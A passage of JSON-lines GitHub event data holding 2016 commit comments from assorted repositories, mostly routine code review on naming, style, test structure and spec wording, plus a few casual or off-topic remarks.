*style:* **Commas should always have a space after.**\n```r\n​    pi = rep(c(1,2), each = 100),\n                 ^\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:46:9:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L46) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- are_beast_replicates_from_same_distribution(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-08T09:17:21Z"}
{"id":"4532789098","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941863,"position":77,"line":77,"path":"src/test/java/automationFramework/TestNG_Framework.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:17:47Z","updated_at":"2016-09-08T09:17:47Z","body":"Should not use main method as a test method"}},"created_at":"2016-09-08T09:17:47Z"}
{"id":"4532790984","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941864,"position":67,"line":67,"path":"src/test/java/automationFramework/TestNG_Framework.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:18:10Z","updated_at":"2016-09-08T09:18:10Z","body":"The web drivers should be init in Beforexxx methods"}},"created_at":"2016-09-08T09:18:10Z"}
{"id":"4532791845","type":"CommitCommentEvent","actor":{"login":"yuchi"},"repo":{"name":"smclab/liferay-plugins"},"payload":{"comment":{"id":18941865,"position":16,"line":31,"path":"portlets/privacy-portlet/docroot/display/view.jsp","commit_id":"c94ab4cd3ca5f58cc05be58a0e0d0c1ec89c7894","created_at":"2016-09-08T09:18:20Z","updated_at":"2016-09-08T09:18:20Z","body":"There’s a single quote just after the double quote. `href=\"'<%=`"}},"created_at":"2016-09-08T09:18:20Z"}
{"id":"4532796461","type":"CommitCommentEvent","actor":{"login":"yuchi"},"repo":{"name":"smclab/liferay-plugins"},"payload":{"comment":{"id":18941870,"position":3,"line":19,"path":"portlets/privacy-portlet/docroot/display/view.jsp","commit_id":"c94ab4cd3ca5f58cc05be58a0e0d0c1ec89c7894","created_at":"2016-09-08T09:19:13Z","updated_at":"2016-09-08T09:19:13Z","body":"You probably need a blank line just after this one."}},"created_at":"2016-09-08T09:19:13Z"}
{"id":"4532797946","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941872,"position":16,"line":16,"path":"src/test/java/pageObjects/Home_Page.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:19:28Z","updated_at":"2016-09-08T09:19:28Z","body":"Please be aware of the naming convention"}},"created_at":"2016-09-08T09:19:28Z"}
{"id":"4532798735","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-model"},"payload":{"comment":{"id":18941874,"position":30,"line":25,"path":"src/main/java/org/atlasapi/media/entity/LocalizedTitle.java","commit_id":"0b9d1ac711b1ede19f68b81d78b77b7eed0ad5b0","created_at":"2016-09-08T09:19:37Z","updated_at":"2016-09-08T09:19:37Z","body":"Was this generated using the IntelliJ Java 7+ template? It looks different than what I'd expect"}},"created_at":"2016-09-08T09:19:37Z"}
{"id":"4532799095","type":"CommitCommentEvent","actor":{"login":"Gymnasiast"},"repo":{"name":"IntelOrca/OpenRCT2"},"payload":{"comment":{"id":18941875,"position":33,"line":242,"path":"src/rct1.h","commit_id":"193309025696cd7476768673f400b48f33ac3d33","created_at":"2016-09-08T09:19:40Z","updated_at":"2016-09-08T09:19:40Z","body":"Seems to be a typo of `destination_tolerance`."}},"created_at":"2016-09-08T09:19:40Z"}
{"id":"4532799276","type":"CommitCommentEvent","actor":{"login":"yuchi"},"repo":{"name":"smclab/liferay-plugins"},"payload":{"comment":{"id":18941876,"position":null,"line":null,"path":null,"commit_id":"c94ab4cd3ca5f58cc05be58a0e0d0c1ec89c7894","created_at":"2016-09-08T09:19:43Z","updated_at":"2016-09-08T09:19:43Z","body":"Reviewed. @borto1899 please fix the points there."}},"created_at":"2016-09-08T09:19:43Z"}
{"id":"4532802478","type":"CommitCommentEvent","actor":{"login":"Wuqiusen"},"repo":{"name":"Wuqiusen/HusonDev"},"payload":{"comment":{"id":18941880,"position":5,"line":17,"path":"README.md","commit_id":"1cd8e0350edc20a5f80f4656a1523079896cd23e","created_at":"2016-09-08T09:20:22Z","updated_at":"2016-09-08T09:20:22Z","body":" compile 'com.github.Wuqiusen:HusonDev:v1.0.5'"}},"created_at":"2016-09-08T09:20:22Z"}
{"id":"4532803249","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941881,"position":10,"line":10,"path":"src/test/java/pageObjects/LogIn_Page.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:20:30Z","updated_at":"2016-09-08T09:20:30Z","body":"the element should be narrow scope in the functions where it is used"}},"created_at":"2016-09-08T09:20:30Z"}
{"id":"4532803508","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18941882,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-08T09:20:33Z","updated_at":"2016-09-08T09:20:33Z","body":"![Szeptember 8. - Csütörtök](http://ujlipot.vakvarju.com/data/napimenu/23.jpg?v=1473152587)\nTárkonyos csirkeraguleves\r\nRakott karfiol\r\nLajcsi szelet"}},"created_at":"2016-09-08T09:20:33Z"}
{"id":"4532805510","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas"},"payload":{"comment":{"id":18941884,"position":34,"line":92,"path":"src/main/java/org/atlasapi/input/DescribedModelTransformer.java","commit_id":"6994ad315cf805577c19ad923e1bf434cf0cc595","created_at":"2016-09-08T09:20:55Z","updated_at":"2016-09-08T09:20:55Z","body":"Is this line within the character limit?"}},"created_at":"2016-09-08T09:20:55Z"}
{"id":"4532807776","type":"CommitCommentEvent","actor":{"login":"Wuqiusen"},"repo":{"name":"Wuqiusen/HusonDev"},"payload":{"comment":{"id":18941885,"position":5,"line":17,"path":"README.md","commit_id":"1cd8e0350edc20a5f80f4656a1523079896cd23e","created_at":"2016-09-08T09:21:20Z","updated_at":"2016-09-08T09:21:20Z","body":" compile 'com.github.Wuqiusen:HusonDev:v1.0.5'"}},"created_at":"2016-09-08T09:21:20Z"}
{"id":"4532807802","type":"CommitCommentEvent","actor":{"login":"sheenobu"},"repo":{"name":"sheenobu/nixos"},"payload":{"comment":{"id":18941886,"position":null,"line":null,"path":null,"commit_id":"cbc179b0c100ed876a7cca9d8ad858d5344f4edc","created_at":"2016-09-08T09:21:20Z","updated_at":"2016-09-08T09:21:20Z","body":"@jgeerds https://github.com/NixOS/nixpkgs/issues/18422"}},"created_at":"2016-09-08T09:21:20Z"}
{"id":"4532808748","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas"},"payload":{"comment":{"id":18941890,"position":36,"line":94,"path":"src/main/java/org/atlasapi/input/DescribedModelTransformer.java","commit_id":"6994ad315cf805577c19ad923e1bf434cf0cc595","created_at":"2016-09-08T09:21:32Z","updated_at":"2016-09-08T09:21:32Z","body":"Use a stream for this, not a for-loop"}},"created_at":"2016-09-08T09:21:32Z"}
{"id":"4532809614","type":"CommitCommentEvent","actor":{"login":"LejayChen"},"repo":{"name":"LejayChen/astro-python-script"},"payload":{"comment":{"id":18941891,"position":null,"line":null,"path":null,"commit_id":"133e49f0c81323b0cf04e9b4977c372337865625","created_at":"2016-09-08T09:21:41Z","updated_at":"2016-09-08T09:21:41Z","body":"add column r_p (projected distance) to dEdata.fits"}},"created_at":"2016-09-08T09:21:41Z"}
{"id":"4532810353","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18941893,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T09:21:49Z","updated_at":"2016-09-08T09:21:49Z","body":"This is because both are non-reserved words. I missed that fact for EXCEPTION -- it was originally reserved but made non-reserved in v2.5 -- and I suppose it should be turned back to reserved (we already did that for GDSCODE and SQLCODE, for example, due to the same conflicts). This would resolve a half of the new conflicts. As for ERROR_MESSAGE, the name is quite common and making it reserved can easily cause some user metadata being non-parseable. Should it be RDB$-prefixed? Any other suggestion?"}},"created_at":"2016-09-08T09:21:49Z"}
{"id":"4532810396","type":"CommitCommentEvent","actor":{"login":"Gymnasiast"},"repo":{"name":"IntelOrca/OpenRCT2"},"payload":{"comment":{"id":18941894,"position":128,"line":337,"path":"src/rct1.h","commit_id":"193309025696cd7476768673f400b48f33ac3d33","created_at":"2016-09-08T09:21:49Z","updated_at":"2016-09-08T09:21:49Z","body":"`num_food` is probably clearer and more in line with how we renamed other `no_` fields."}},"created_at":"2016-09-08T09:21:49Z"}
{"id":"4532812724","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"boswelja/AndroidN-ify"},"payload":{"comment":{"id":18941899,"position":null,"line":null,"path":null,"commit_id":"76769d177689ee0b4d2f1988b41355e26b72aa92","created_at":"2016-09-08T09:22:16Z","updated_at":"2016-09-08T09:22:16Z","body":"Nice."}},"created_at":"2016-09-08T09:22:16Z"}
{"id":"4532817577","type":"CommitCommentEvent","actor":{"login":"jtp10181"},"repo":{"name":"kvangent/PokeAlarm"},"payload":{"comment":{"id":18941909,"position":null,"line":null,"path":null,"commit_id":"19a95a4133ec000d68cc085aa0b9c7b1ef5f7594","created_at":"2016-09-08T09:23:10Z","updated_at":"2016-09-08T09:23:10Z","body":"I was just going to check into this venue API call myself, can't wait to check this out."}},"created_at":"2016-09-08T09:23:10Z"}
{"id":"4532822577","type":"CommitCommentEvent","actor":{"login":"sbgillett"},"repo":{"name":"sbgillett/acteon"},"payload":{"comment":{"id":18941912,"position":78,"line":92,"path":"AGLOnline.psm1","commit_id":"ad10ea71fd922e6f2a373c85b41d9f972717f0a3","created_at":"2016-09-08T09:24:06Z","updated_at":"2016-09-08T09:24:06Z","body":"testing"}},"created_at":"2016-09-08T09:24:06Z"}
{"id":"4532823352","type":"CommitCommentEvent","actor":{"login":"sbgillett"},"repo":{"name":"sbgillett/acteon"},"payload":{"comment":{"id":18941914,"position":78,"line":92,"path":"AGLOnline.psm1","commit_id":"ad10ea71fd922e6f2a373c85b41d9f972717f0a3","created_at":"2016-09-08T09:24:16Z","updated_at":"2016-09-08T09:24:16Z","body":"testing"}},"created_at":"2016-09-08T09:24:16Z"}
{"id":"4532824849","type":"CommitCommentEvent","actor":{"login":"chenhuc"},"repo":{"name":"bmSoftDeveloper/BMBenz"},"payload":{"comment":{"id":18941915,"position":null,"line":null,"path":null,"commit_id":"32c85acd828b1827e9519d449cd905ac27f4c160","created_at":"2016-09-08T09:24:33Z","updated_at":"2016-09-08T09:24:33Z","body":"1. create New freaks"}},"created_at":"2016-09-08T09:24:33Z"}
{"id":"4532825187","type":"CommitCommentEvent","actor":{"login":"boswelja"},"repo":{"name":"boswelja/AndroidN-ify"},"payload":{"comment":{"id":18941916,"position":null,"line":null,"path":null,"commit_id":"76769d177689ee0b4d2f1988b41355e26b72aa92","created_at":"2016-09-08T09:24:38Z","updated_at":"2016-09-08T09:24:38Z","body":"nvm, why does CM have to make this harder :(\r\nUnless we can get a way of loading CMs dynamic tiles (which I'm not smart enough to do), this will be impossible @paphonbth "}},"created_at":"2016-09-08T09:24:38Z"}
{"id":"4532825341","type":"CommitCommentEvent","actor":{"login":"sbgillett"},"repo":{"name":"sbgillett/acteon"},"payload":{"comment":{"id":18941918,"position":81,"line":87,"path":"AGLOnline.psm1","commit_id":"ad10ea71fd922e6f2a373c85b41d9f972717f0a3","created_at":"2016-09-08T09:24:39Z","updated_at":"2016-09-08T09:24:39Z","body":"balls"}},"created_at":"2016-09-08T09:24:39Z"}
{"id":"4532826331","type":"CommitCommentEvent","actor":{"login":"zhangnaifan"},"repo":{"name":"LeafyWang/Homework"},"payload":{"comment":{"id":18941920,"position":null,"line":null,"path":null,"commit_id":"db40c4c790e225cd9f0c84e6aac5b40976b46f40","created_at":"2016-09-08T09:24:50Z","updated_at":"2016-09-08T09:24:50Z","body":"The input format requirement seems a little bit awful..."}},"created_at":"2016-09-08T09:24:50Z"}
{"id":"4532826714","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941921,"position":64,"line":64,"path":"src/test/java/pageObjects/LogIn_Page.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:24:54Z","updated_at":"2016-09-08T09:24:54Z","body":"the prefix txt_ is obsolete in naming convention now. Moreover, it is not suitable for a static web element like p, div..."}},"created_at":"2016-09-08T09:24:54Z"}
{"id":"4532827362","type":"CommitCommentEvent","actor":{"login":"macic"},"repo":{"name":"arskom/spyne"},"payload":{"comment":{"id":18941923,"position":null,"line":null,"path":null,"commit_id":"0e762659f61179899043ec924c7b5ab45aef4a13","created_at":"2016-09-08T09:25:02Z","updated_at":"2016-09-08T09:25:02Z","body":"This is now painful not to have it in 2.12.11, can we tag it as this is minor and release as 2.12.12 instead of waiting for 2.13."}},"created_at":"2016-09-08T09:25:02Z"}
{"id":"4532829498","type":"CommitCommentEvent","actor":{"login":"contentsteam"},"repo":{"name":"contentsteam/-"},"payload":{"comment":{"id":18941928,"position":null,"line":null,"path":null,"commit_id":"e5e1b6a687cb7bf6f1c88a95c89c9b4b9c55136b","created_at":"2016-09-08T09:25:27Z","updated_at":"2016-09-08T09:25:27Z","body":"ㄴㅇㄹㄴㅇㄹㄴㅇㄹ"}},"created_at":"2016-09-08T09:25:27Z"}
{"id":"4532833388","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18941933,"position":null,"line":null,"path":null,"commit_id":"6f7e4d54dc596f23c4b51510a6693c3c9e6fbe1c","created_at":"2016-09-08T09:26:13Z","updated_at":"2016-09-08T09:26:13Z","body":"Can we _PLEASE_ wait with adding anchors and other stuff that doesn't help making it easy to write the protocol now? "}},"created_at":"2016-09-08T09:26:13Z"}
{"id":"4532836633","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"boswelja/AndroidN-ify"},"payload":{"comment":{"id":18941941,"position":null,"line":null,"path":null,"commit_id":"76769d177689ee0b4d2f1988b41355e26b72aa92","created_at":"2016-09-08T09:26:50Z","updated_at":"2016-09-08T09:26:50Z","body":"Idk. The LiveDisplay tile in SystemUI is already good. Don't know what's the point to move it away.\n\nAlso I tried loading dynamic tiles too and failed."}},"created_at":"2016-09-08T09:26:50Z"}
{"id":"4532843127","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18941955,"position":23,"line":40,"path":"otrv4.md","commit_id":"c0b86a6b5c00933ef56e952014b64e6082aa0d82","created_at":"2016-09-08T09:28:06Z","updated_at":"2016-09-08T09:28:06Z","body":"What does \"an available network\" mean? What does \"enables the exchange of messages\" mean? This is very unclear."}},"created_at":"2016-09-08T09:28:06Z"}
{"id":"4532843227","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941956,"position":12,"line":12,"path":"src/test/java/pageObjects/Product_Page.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:28:07Z","updated_at":"2016-09-08T09:28:07Z","body":"IMHO, the page object pattern is a bit different like this. The page should accept webdriver as a parameter in the constructor and its web objects are not static and are initialized in a methods."}},"created_at":"2016-09-08T09:28:07Z"}
{"id":"4532845743","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18941960,"position":27,"line":44,"path":"otrv4.md","commit_id":"c0b86a6b5c00933ef56e952014b64e6082aa0d82","created_at":"2016-09-08T09:28:35Z","updated_at":"2016-09-08T09:28:35Z","body":"We shouldn't say what things the protocol DOESN'T do. In that case we can spend the whole day on that."}},"created_at":"2016-09-08T09:28:35Z"}
{"id":"4532846032","type":"CommitCommentEvent","actor":{"login":"bonii-xx"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":18941961,"position":null,"line":null,"path":null,"commit_id":"9466eba928ac2918380e6e3ba97f80f431b3a127","created_at":"2016-09-08T09:28:39Z","updated_at":"2016-09-08T09:28:39Z","body":"Thanks"}},"created_at":"2016-09-08T09:28:39Z"}
{"id":"4532846373","type":"CommitCommentEvent","actor":{"login":"boswelja"},"repo":{"name":"boswelja/AndroidN-ify"},"payload":{"comment":{"id":18941962,"position":null,"line":null,"path":null,"commit_id":"76769d177689ee0b4d2f1988b41355e26b72aa92","created_at":"2016-09-08T09:28:43Z","updated_at":"2016-09-08T09:28:43Z","body":"@paphonbth some ppl are complaining about it not working, and even fewer are on very old builds with 2 tiles :/"}},"created_at":"2016-09-08T09:28:43Z"}
{"id":"4532846610","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas"},"payload":{"comment":{"id":18941963,"position":null,"line":null,"path":null,"commit_id":"6994ad315cf805577c19ad923e1bf434cf0cc595","created_at":"2016-09-08T09:28:46Z","updated_at":"2016-09-08T09:28:46Z","body":"You also need to update the logic in the ContentWriteController that merges a new content with an existing one when writing and also the logic that merges content together to create equivalent content.\r\n\r\nFor the first you will likely just replace the existing titles with the new ones, for the second one you will likely only keep the titles from the chosen content."}},"created_at":"2016-09-08T09:28:46Z"}
{"id":"4532846639","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18941964,"position":29,"line":432,"path":"cura/BuildVolume.py","commit_id":"9a84deb14ece77de330ddd7dfac39ab22cf63015","created_at":"2016-09-08T09:28:46Z","updated_at":"2016-09-08T09:28:46Z","body":"If you have multiple checks, this should become\r\nself._has_errors = self._has_errors or collision"}},"created_at":"2016-09-08T09:28:46Z"}
{"id":"4532847872","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18941967,"position":14,"line":87,"path":"otrv4.md","commit_id":"dbb732444deb90dd72b879c0c965a846b7cebe6b","created_at":"2016-09-08T09:29:01Z","updated_at":"2016-09-08T09:29:01Z","body":"\"Neil Unger\"? Who is that?"}},"created_at":"2016-09-08T09:29:01Z"}
{"id":"4532849452","type":"CommitCommentEvent","actor":{"login":"earthquakesan"},"repo":{"name":"big-data-europe/docker-hive"},"payload":{"comment":{"id":18941969,"position":null,"line":null,"path":null,"commit_id":"f045946f91e966e3943d6994040b516d50af0ec7","created_at":"2016-09-08T09:29:19Z","updated_at":"2016-09-08T09:29:19Z","body":"@gmouchakis, I fixed procps issue, thanks for the pointer. The other issue is a problem with Hive, which is fixed in 2.1.1 and 2.2.0 -- https://issues.apache.org/jira/browse/HIVE-14223\r\nI will create a new branch with Hive 2.2.0."}},"created_at":"2016-09-08T09:29:19Z"}
{"id":"4532849860","type":"CommitCommentEvent","actor":{"login":"kosmos"},"repo":{"name":"kosmos/yaroslav"},"payload":{"comment":{"id":18941970,"position":null,"line":null,"path":null,"commit_id":"304515da86f38ef8387f090216b0318279e78051","created_at":"2016-09-08T09:29:25Z","updated_at":"2016-09-08T09:29:25Z","body":"Мне кажется sassLint таски должны запускаться перед sass или нет?"}},"created_at":"2016-09-08T09:29:25Z"}
{"id":"4532850636","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18941971,"position":57,"line":148,"path":"otrv4.md","commit_id":"dbb732444deb90dd72b879c0c965a846b7cebe6b","created_at":"2016-09-08T09:29:33Z","updated_at":"2016-09-08T09:29:33Z","body":"This link is broken."}},"created_at":"2016-09-08T09:29:33Z"}
{"id":"4532851677","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18941974,"position":100,"line":100,"path":"src/test/java/pageObjects/Product_Page.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:29:45Z","updated_at":"2016-09-08T09:29:45Z","body":"Please avoid duplicated statement. it occurs too many places. It's costly once you want have a modification.\r\n```\r\n//input[@title ='billinglastname']\r\n```"}},"created_at":"2016-09-08T09:29:45Z"}
{"id":"4532852319","type":"CommitCommentEvent","actor":{"login":"Scooletz"},"repo":{"name":"Franklin89/NGitLab"},"payload":{"comment":{"id":18941976,"position":37,"line":29,"path":"README.md","commit_id":"7e2d4c293cb92f61dc27bd2b21d07b08363cbd80","created_at":"2016-09-08T09:29:52Z","updated_at":"2016-09-08T09:29:52Z","body":":heart: "}},"created_at":"2016-09-08T09:29:52Z"}
{"id":"4532858605","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18942005,"position":null,"line":null,"path":null,"commit_id":"51dfc730aac114d30f9bf25cf0d26c0220f34070","created_at":"2016-09-08T09:31:03Z","updated_at":"2016-09-08T09:31:03Z","body":"It is obvious that you do not agree with me in looks, but also do not want to discuss it. I can not understand why you have created a repository, at my request, if you refuse to cooperate. You do everything in silence and alone. I saw my changes after the merger, and I think that this is a way to nowhere.\r\n\r\n\"Sacrifice modularization for better perfomance\" ©\r\nLooks like a joke, because it's not perfomance when you have a lot of unobvious calls in each place, for example, try to count calls of RefreshPins in getters/setters of settings - it's a crutch. It could be much simplier, but you prefer some sort of \"perfomance\" and easiest solutions simillar to \"Everybody must know about map, measurements, caches implementation\" ... about everything.\r\n\r\nI agree, there is nothing fantastic in my changes, but I work step-by-step to split responsibilities and to hide unnecessary details from outside. It's impossible to do all at once, so it took me a while, but you started merge without any ask to me \"Is it working? Is it good ide to merge in this state? Is it possible to reduce number of conflicts?\".\r\nI've spent so much time in investigation \"What do you want in this boilerplate?\", but it does not matter because the is not collaboration when you \"merge it to remove\", without any ask about \"what is the idea of this changes and what is the benefit?\"\r\n\r\nI would prefer to stop my activities in this repo."}},"created_at":"2016-09-08T09:31:03Z"}
{"id":"4532859902","type":"CommitCommentEvent","actor":{"login":"Binaryvector"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18942009,"position":62,"line":62,"path":"HarvestMap/Database/HarvestMapDatabase.lua","commit_id":"51dfc730aac114d30f9bf25cf0d26c0220f34070","created_at":"2016-09-08T09:31:20Z","updated_at":"2016-09-08T09:31:20Z","body":"This function was added by you in\r\nhttps://github.com/MrUpyachka/HarvestMap/commit/3aa9b58a671185e1834309fa7a3ae8e32a0d62f8"}},"created_at":"2016-09-08T09:31:20Z"}
{"id":"4532860489","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18942010,"position":40,"line":40,"path":"src/test/java/utility/Log.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:31:26Z","updated_at":"2016-09-08T09:31:26Z","body":"I am not sure I understand the meaning of the last 4 Xes.  :)"}},"created_at":"2016-09-08T09:31:26Z"}
{"id":"4532864602","type":"CommitCommentEvent","actor":{"login":"nlopes"},"repo":{"name":"nlopes/slack"},"payload":{"comment":{"id":18942020,"position":null,"line":null,"path":null,"commit_id":"b7940f209838f93dc7ab0d823145513c9660f22a","created_at":"2016-09-08T09:32:13Z","updated_at":"2016-09-08T09:32:13Z","body":"I'm reverting this until I have some time to dig into the issue. [PR](https://github.com/nlopes/slack/pull/98)"}},"created_at":"2016-09-08T09:32:13Z"}
{"id":"4532868918","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18942029,"position":null,"line":null,"path":null,"commit_id":"173be4886977f85bf749c6afade2e3a5a08c69d3","created_at":"2016-09-08T09:33:03Z","updated_at":"2016-09-08T09:33:03Z","body":"I assume that each one of these notes will be explained further in the text? It might be a good idea to use numbered rows as well."}},"created_at":"2016-09-08T09:33:03Z"}
{"id":"4532869061","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18942030,"position":27,"line":27,"path":"src/test/java/utility/Utils.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:33:05Z","updated_at":"2016-09-08T09:33:05Z","body":"please avoid type prefix like s, i, b.... they are not suitable for java/groovy styles "}},"created_at":"2016-09-08T09:33:05Z"}
{"id":"4532871463","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18942033,"position":6,"line":30,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-08T09:33:33Z","updated_at":"2016-09-08T09:33:33Z","body":"Python closes the file eventually, and normal file reading at least does not impose a lock on a file in Windows and Linux (had to look that up). Not sure about zipfile at that. In any case, it's also just good practice."}},"created_at":"2016-09-08T09:33:33Z"}
{"id":"4532876542","type":"CommitCommentEvent","actor":{"login":"tapojoy"},"repo":{"name":"tapojoy/aqhmali"},"payload":{"comment":{"id":18942046,"position":1,"line":1,"path":"README.md","commit_id":"ea5ef4c043538b63d5e2934b2219cf0fdbe8668e","created_at":"2016-09-08T09:34:37Z","updated_at":"2016-09-08T09:34:37Z","body":"xc"}},"created_at":"2016-09-08T09:34:37Z"}
{"id":"4532876796","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18942048,"position":38,"line":38,"path":"src/test/java/utility/Utils.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:34:40Z","updated_at":"2016-09-08T09:34:40Z","body":"The browser name should be trim and transformed into a unique case.\r\nHow about a value that is not Firefox and Chrome? it should be Firefox/Chrome by default."}},"created_at":"2016-09-08T09:34:40Z"}
{"id":"4532879116","type":"CommitCommentEvent","actor":{"login":"gronke"},"repo":{"name":"gogits/gogs"},"payload":{"comment":{"id":18942050,"position":null,"line":null,"path":null,"commit_id":"7c1fbed05764ff27c0684df92961a030e2e3344b","created_at":"2016-09-08T09:35:09Z","updated_at":"2016-09-08T09:35:09Z","body":"👍 "}},"created_at":"2016-09-08T09:35:09Z"}
{"id":"4532882792","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18942054,"position":76,"line":76,"path":"src/test/java/utility/Utils.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:35:55Z","updated_at":"2016-09-08T09:35:55Z","body":"The meaning of the function is not accurate. Please think of a different name."}},"created_at":"2016-09-08T09:35:55Z"}
{"id":"4532883598","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18942058,"position":3,"line":3,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-08T09:36:04Z","updated_at":"2016-09-08T09:36:04Z","body":"I still have no idea what the first comment meant."}},"created_at":"2016-09-08T09:36:04Z"}
{"id":"4532883754","type":"CommitCommentEvent","actor":{"login":"ebetica"},"repo":{"name":"facebook/fbthrift"},"payload":{"comment":{"id":18942059,"position":null,"line":null,"path":null,"commit_id":"aeaa4e685de99f4acfc5cc4288502476c74a697c","created_at":"2016-09-08T09:36:06Z","updated_at":"2016-09-08T09:36:06Z","body":"WIthout this statement, we run into an ambiguious call error https://github.com/facebook/fblualib/issues/69. (I confirmed on my own computer)"}},"created_at":"2016-09-08T09:36:06Z"}
{"id":"4532885363","type":"CommitCommentEvent","actor":{"login":"Binaryvector"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18942064,"position":26,"line":26,"path":"HarvestMap/Database/HarvestMapDatabase.lua","commit_id":"51dfc730aac114d30f9bf25cf0d26c0220f34070","created_at":"2016-09-08T09:36:25Z","updated_at":"2016-09-08T09:36:25Z","body":"Problem is that different modules use different maps. For instance if the player is looking at a different map than he is currently standing on, then the compass module and the map module need data from different maps.\r\nSo yes, every module needs to know which cache is used or at least it needs to be possible to access the data from different maps/caches at the same time."}},"created_at":"2016-09-08T09:36:25Z"}
{"id":"4532886559","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18942067,"position":7,"line":7,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-08T09:36:39Z","updated_at":"2016-09-08T09:36:39Z","body":"Disagree. I think the formal description of them should be in one section which is easy to look at. It shouldn't be spread all over the place."}},"created_at":"2016-09-08T09:36:39Z"}
